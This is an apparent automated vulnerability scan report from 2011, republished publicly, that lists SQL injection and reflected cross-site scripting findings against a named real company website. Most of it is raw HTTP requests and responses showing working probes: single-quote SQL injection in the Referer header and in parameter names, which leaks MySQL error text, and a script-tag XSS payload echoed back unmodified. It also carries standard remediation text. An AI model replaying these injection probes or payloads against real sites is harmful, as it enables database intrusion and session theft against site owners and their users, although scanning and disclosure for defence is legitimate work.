2-19-2011, SQL Injection, DORK, CWe-89, crimsonlogic.com

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sat Feb 19 10:57:25 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]

1.2. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [name of an arbitrarily supplied request parameter]

1.3. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]

1.4. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [name of an arbitrarily supplied request parameter]

1.5. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]

1.6. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [name of an arbitrarily supplied request parameter]

1.7. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

1.8. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [name of an arbitrarily supplied request parameter]

2.2. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [name of an arbitrarily supplied request parameter]

2.3. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [name of an arbitrarily supplied request parameter]

2.4. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [1' parameter]

2.5. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [1' parameter]

2.6. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

2.7. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_company parameter]

2.8. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_email parameter]

2.9. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_message parameter]

2.10. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_name parameter]

2.11. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_telephone parameter]

2.12. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [p_validator parameter]

2.13. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]

2.14. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]

2.15. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]

2.16. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]

2.17. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]

2.18. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]

2.19. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

2.20. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

2.21. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

2.22. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

3. SQL statement in request parameter

4. Cookie without HttpOnly flag set

4.1. http://www.outsourcingdotnetdevelopment.com/mail/captcha.php

4.2. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html

5. Cross-domain Referer leakage

6. Cross-domain script include

6.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

6.2. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html

6.3. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html

6.4. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html

7. Email addresses disclosed

8. Robots.txt file


1. SQL injection  next
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [Referer HTTP header]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:59 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 6402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
1.2. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
1.3. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:06 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
1.4. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
1.5. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:04 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:06 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
1.6. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:43 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
1.7. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:14 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 13797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
1.8. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /outsourcing-dot-net-development-contact-us.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /outsourcing-dot-net-development-contact-us.html?1''=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 12188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
2. Cross-site scripting (reflected)  previous  next
There are 22 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2d0"><script>alert(1)</script>a4a9133cc3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html?2e2d0"><script>alert(1)</script>a4a9133cc3c=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
